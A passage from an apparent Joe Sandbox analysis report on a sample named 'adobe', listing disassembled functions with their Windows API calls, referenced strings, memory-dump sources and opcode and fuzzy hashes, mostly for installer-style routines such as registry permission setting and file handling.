                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4277397052-0
                                                                                                                                                          • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                          • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                                                                                          • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                          • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004726CC Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0045C86C: SetLastError.KERNEL32(00000057,00000000,0045C938,?,?,?,?,00000000), ref: 0045C8D7
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 00472759
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 0047276F
                                                                                                                                                          Strings
                                                                                                                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 00472763
                                                                                                                                                          • Setting permissions on registry key: %s\%s, xrefs: 0047271E
                                                                                                                                                          • Failed to set permissions on registry key (%d)., xrefs: 00472780
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                                                                          • API String ID: 1452528299-4018462623
                                                                                                                                                          • Opcode ID: ea809eea215e45988c37a6150222403cec11ab8ce7110ab5d38e529414a03156
                                                                                                                                                          • Instruction ID: b8443cf5e2643b11ee943be54b693f5644c44bad37c33e6ad4d9b43925b6925c
                                                                                                                                                          • Opcode Fuzzy Hash: ea809eea215e45988c37a6150222403cec11ab8ce7110ab5d38e529414a03156
                                                                                                                                                          • Instruction Fuzzy Hash: 7021C870A042045FCB04DBAEDA817EEBBE4EF49314F50417BF408E7392C7B859058B69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 262959230-0
                                                                                                                                                          • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                                                                          • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A122A18830$A480
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3325508737-0
                                                                                                                                                          • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                                                                          • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                                                                                          • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                                                                          • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                                                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                                                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Enum$NameOpenResourceUniversal
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 3604996873-1505515367
                                                                                                                                                          • Opcode ID: 90da826c1d8458febfd188090b301e9900f2175c3eb38f271cd2116fbe9588a2
                                                                                                                                                          • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                                                                                                          • Opcode Fuzzy Hash: 90da826c1d8458febfd188090b301e9900f2175c3eb38f271cd2116fbe9588a2
                                                                                                                                                          • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044C814 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrawText$EmptyRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 182455014-2867612384
                                                                                                                                                          • Opcode ID: 7f52b274938ae0c7e24f2bc5de4b404ec72a3036d565b82a92ce2242a5cafbe0
                                                                                                                                                          • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                                                                                                          • Opcode Fuzzy Hash: 7f52b274938ae0c7e24f2bc5de4b404ec72a3036d565b82a92ce2242a5cafbe0
                                                                                                                                                          • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042EDE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 73A1A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                                                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                                                                                                          • 73A1A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                                                                                          • String ID: ...\
                                                                                                                                                          • API String ID: 2998766281-983595016
                                                                                                                                                          • Opcode ID: f81dbdf93088b627836addcdc7cf30af3d11f5edf595b4096ae4873c4ce467f7
                                                                                                                                                          • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
                                                                                                                                                          • Opcode Fuzzy Hash: f81dbdf93088b627836addcdc7cf30af3d11f5edf595b4096ae4873c4ce467f7
                                                                                                                                                          • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00452F2C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045301B
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045302B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateFileHandle
                                                                                                                                                          • String ID: (rI$.tmp
                                                                                                                                                          • API String ID: 3498533004-3138636223
                                                                                                                                                          • Opcode ID: c0eeadadda12cacd40dc712cc63d2bdf4847593f2ea3ac46c8d4d901c04b590f
                                                                                                                                                          • Instruction ID: 32dd1173b2630893fad950a4618aed64456021674ddb1d0776c2c96b8418077d
                                                                                                                                                          • Opcode Fuzzy Hash: c0eeadadda12cacd40dc712cc63d2bdf4847593f2ea3ac46c8d4d901c04b590f
                                                                                                                                                          • Instruction Fuzzy Hash: E431C070A00219ABCB10EFA5D942B9EBBB5AF44745F20402BF800B72C2D6786F0587A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExitMessageProcess
                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                          • API String ID: 1220098344-2970929446
                                                                                                                                                          • Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                                                                                          • Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
                                                                                                                                                          • Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                                                                                          • Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00455EF4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455F48
                                                                                                                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455F75
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                                                          • API String ID: 1312246647-2435364021
                                                                                                                                                          • Opcode ID: 8db503a5e71761849dda00c4474342a384a20319f516bd6a6f52dcc7b471ddee
                                                                                                                                                          • Instruction ID: 9dd964af6d171c160354b7431e2e7bf6b237ee99b3e18c78647d6df6d6a6389e
                                                                                                                                                          • Opcode Fuzzy Hash: 8db503a5e71761849dda00c4474342a384a20319f516bd6a6f52dcc7b471ddee
                                                                                                                                                          • Instruction Fuzzy Hash: 9B119632B00A04BFDB11DFA6CD6196EB7ADEB89715F10847AFC04D3652D6789904CB54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045644C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456466
                                                                                                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456503
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to create DebugClientWnd, xrefs: 004564CC
                                                                                                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456492
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                                          • API String ID: 3850602802-3720027226
                                                                                                                                                          • Opcode ID: de1203681df2f13ee3edcb29637d6c05e1bb22d995aac381a7a8ad744fd246b2
                                                                                                                                                          • Instruction ID: d6336fda61e0ff9d2ebfbe9a4145e2f7bc73dda7394494d671267afbd3e9fcca
                                                                                                                                                          • Opcode Fuzzy Hash: de1203681df2f13ee3edcb29637d6c05e1bb22d995aac381a7a8ad744fd246b2
                                                                                                                                                          • Instruction Fuzzy Hash: 6F11E3B06042506FD310AB299C41B5B7BA89B5630DF45443BF984DF387D3798818CBAE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00477308 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                          • GetFocus.USER32 ref: 00477373
                                                                                                                                                          • GetKeyState.USER32(0000007A), ref: 00477385
                                                                                                                                                          • WaitMessage.USER32(?,00000000,004773AC,?,00000000,004773D3,?,?,00000001,00000000,?,?,?,0047EBCA,00000000,0047FACB), ref: 0047738F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                                          • String ID: Wnd=$%x
                                                                                                                                                          • API String ID: 1381870634-2927251529
                                                                                                                                                          • Opcode ID: 74c7d81c0a94b14d72896173badfac2de004896181af197dda579923c67c8a60
                                                                                                                                                          • Instruction ID: f0690932e29077b4fb13f85f05d0aefb3d3524bf13f98187e5fd5d5cdf43dc38
                                                                                                                                                          • Opcode Fuzzy Hash: 74c7d81c0a94b14d72896173badfac2de004896181af197dda579923c67c8a60
                                                                                                                                                          • Instruction Fuzzy Hash: 8711A330608244EFC701EF65DC42A9E77B9EB09718B9184B6FC08E3791D73C6E00DA69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046D788 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D790
                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D79F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$File$LocalSystem
                                                                                                                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                                                          • API String ID: 1748579591-1013271723
                                                                                                                                                          • Opcode ID: 0a98023ab13e448872c12fbe6f13c89687d1b5f5aae4a43975ed4079bbbdddec
                                                                                                                                                          • Instruction ID: b3b582457b019a17bb8afa83b58bfba6494bfd74b872bfeb83ea535623e92781
                                                                                                                                                          • Opcode Fuzzy Hash: 0a98023ab13e448872c12fbe6f13c89687d1b5f5aae4a43975ed4079bbbdddec
                                                                                                                                                          • Instruction Fuzzy Hash: CE11FBA090C3909AD340DF6AC44432BBAE4AB89714F04492EF9D8D6381E779C948DBB7
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0048213C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
